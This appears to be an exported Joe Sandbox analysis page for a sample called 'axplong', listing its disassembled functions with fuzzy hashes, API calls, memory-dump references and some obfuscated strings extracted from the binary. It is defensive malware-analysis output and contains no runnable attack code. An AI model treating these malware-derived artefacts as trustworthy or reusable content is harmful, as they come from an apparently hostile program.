Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0f2a5fce8de98ea8f135755d6c4dab5fd172d4eef8476b72b3cf4edeaa8f3365
Instruction ID: 4c7f58ce01f2a3bb6bcb46aec718f7bd9cf22d5c99916d2cd46ce57af45cc5c9
Opcode Fuzzy Hash: 0f2a5fce8de98ea8f135755d6c4dab5fd172d4eef8476b72b3cf4edeaa8f3365
Instruction Fuzzy Hash: 0BC26F72E086288FDB25DF28CD407E9B3B5EB45315F1441EAD84EE7240E779AE85AF40

Function 00F62BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: ab9342a8ad24ff7d5597c76afe23e8a50e89a31da72c28157156d411edffcfd6
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: D5F14071E006199FDF14CFA8C9806AEF7B1FF88324F158269E819AB345D731AE45DB90

Function 00F3CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00F3CE82,?,?,?,?,00F3CEB7,?,?,?,?,?,?,00F3C42D,?,00000001), ref: 00F3CB33

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 50abcfe5130201d9d4a1cbcd6c35042f6e0cb30d6846373f43ce2cc0870ca588
Instruction ID: d4fbb88684116ee28e9d6a5922a00eed8c636a6eee78adaddc8c9b04ce6734db
Opcode Fuzzy Hash: 50abcfe5130201d9d4a1cbcd6c35042f6e0cb30d6846373f43ce2cc0870ca588
Instruction Fuzzy Hash: 54D01233A5253CA7CA122BA4AC09DADFB199E45B707440121ED09771218E515C81BBD6

Function 00F57D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00F57EFF

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 4f6c00998ec942cf78cf20620893320bf1fed108fae1053b1d9f21e9a7f9eb92
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 2D51CB71A0C74857CB38BA38B8977BE77AA9F01353F140459DF42D7682DA119D0EB391

Function 00F24CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bb54dc0558aaefb562bb2427c5b2bab820c694eb9d1f5f67297df1d10cbda50
Instruction ID: 2bb1951b8d255c7c97574cf38f302eb42f2d0987eccd931b4fa714add2198b6e
Opcode Fuzzy Hash: 3bb54dc0558aaefb562bb2427c5b2bab820c694eb9d1f5f67297df1d10cbda50
Instruction Fuzzy Hash: 08226FB7F515144BDB0CCA9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9159A44

Function 00F66F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad31d1d6acc5d0378add9b7993b7b01fb8d27d2b30cf474ebf11b60ce98acf46
Instruction ID: 53f132577939c8711cfe0ffaba54689a18a3650fff3cd5729638ba33492c57e2
Opcode Fuzzy Hash: ad31d1d6acc5d0378add9b7993b7b01fb8d27d2b30cf474ebf11b60ce98acf46
Instruction Fuzzy Hash: 6EB18C32614708DFD714DF28C486B657BE0FF45368F258659E899CF2A1C336E982DB40

Function 00F3D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00F2247E

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 788592b0303fee3384fb999bdd96f9278580cb3661b0d44209735f273f539ae6
Instruction ID: 503337e038a67f173916a73d84f7b6232c26ef60bd36f6e86c980cd136f1661c
Opcode Fuzzy Hash: 788592b0303fee3384fb999bdd96f9278580cb3661b0d44209735f273f539ae6
Instruction Fuzzy Hash: 44518DB2E006098FDB19CF69E8C17AEBBF4FB08720F24856AD805EB254D7749940EF50

Function 00F24AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2592ee9b5da2262ebc8d5c7b469657641c4ef5af71aac5387365022d3d18149
Instruction ID: f48540a8e181f3f48a4b7cd6fea35b6db4ae7b4d1d32c9ca8ea4ffb0e18efec6
Opcode Fuzzy Hash: e2592ee9b5da2262ebc8d5c7b469657641c4ef5af71aac5387365022d3d18149
Instruction Fuzzy Hash: C151C17160C3918FD319CF2D951523ABFE1BFD5200F084A9EE4DA87292D774EA44DBA2

Function 00F6777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fa81357e349b5e2a46487a4cab0e08eb7584e2678fb97ea059e107fe81d4d3
Instruction ID: 67b53c4531ec49b121b7d62eed0c11b7f8e4c24ab94e8656d028b39be0b43d16
Opcode Fuzzy Hash: c0fa81357e349b5e2a46487a4cab0e08eb7584e2678fb97ea059e107fe81d4d3
Instruction Fuzzy Hash: 9921B673F205394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D96CD917E2E4

Function 00F6765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d5d9bc37be452d6009d196a89432fb8ffb707a034e9d414473a62c83968467
Instruction ID: c73dcefdf600b248b48f80a270c9d3b6862e2aa770d4e48107c74601f8dd5210
Opcode Fuzzy Hash: b0d5d9bc37be452d6009d196a89432fb8ffb707a034e9d414473a62c83968467
Instruction Fuzzy Hash: E2117723F30C255B675C816D8C172BAA5D2DBD825471F533AD826EB284E994DE23D290

Function 00F68720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 631a6efb7602800e91766b995f0abb30b3e123fa2f215c67422f066ba0599343
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D2112B7BA0014147D6048A3DD9F46B6A796EBC63F1B3C437ED1414B758DE22E947F900

Function 00F5645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01fd83bdd676a084e6e7f31687b41de31779561b258724154855a43794de7146
Instruction ID: 8d5c010560c65fcf58d6b37dad88b927038b0b67f66c2d9ff8b1b19c411c460a
Opcode Fuzzy Hash: 01fd83bdd676a084e6e7f31687b41de31779561b258724154855a43794de7146
Instruction Fuzzy Hash: E3E08C31240A086FDF35BB14CC1CD993B6AEB52352F514800FD248B222CF69ED8AEA80

Function 00F5A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 1099ac372eace6936b0bf3a93634426f1fc8a8e9214fcc40308b31b87ab20a07
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 3CE08C32911628EBCB15DBC8C904D8AF7ECEB48B11F154196FA01E3240C274DF04DBD0

Function 00F32E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

stoi argument out of range, xrefs: 00F34269
8KG0fymoFx==, xrefs: 00F32EC7
Fz==, xrefs: 00F3369E
invalid stoi argument, xrefs: 00F3425A
HBhr, xrefs: 00F3378F
WGt=, xrefs: 00F333BA
246122658369, xrefs: 00F333D4

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 84ef601bbc194b48ae938e8b0242893cde9e71a83f2f5ff134eb2ecb907ec116
Instruction ID: 9ef04b641695f34ad5685a7215b633a936cbc8133554f3c96b4b449238ea3468
Opcode Fuzzy Hash: 84ef601bbc194b48ae938e8b0242893cde9e71a83f2f5ff134eb2ecb907ec116
Instruction Fuzzy Hash: 9802C471D00248EFEF14EFA8CC45BDEBBB5EF05314F544158E805A7282D779AA84DBA2

Function 00F22E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F22F1F
GetCurrentThreadId.KERNEL32 ref: 00F22F3E
__Mtx_unlock.LIBCPMT ref: 00F22F8C
__Cnd_broadcast.LIBCPMT ref: 00F22FA3
__Mtx_unlock.LIBCPMT ref: 00F230B5
GetCurrentThreadId.KERNEL32 ref: 00F230F2
__Mtx_unlock.LIBCPMT ref: 00F2315B

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
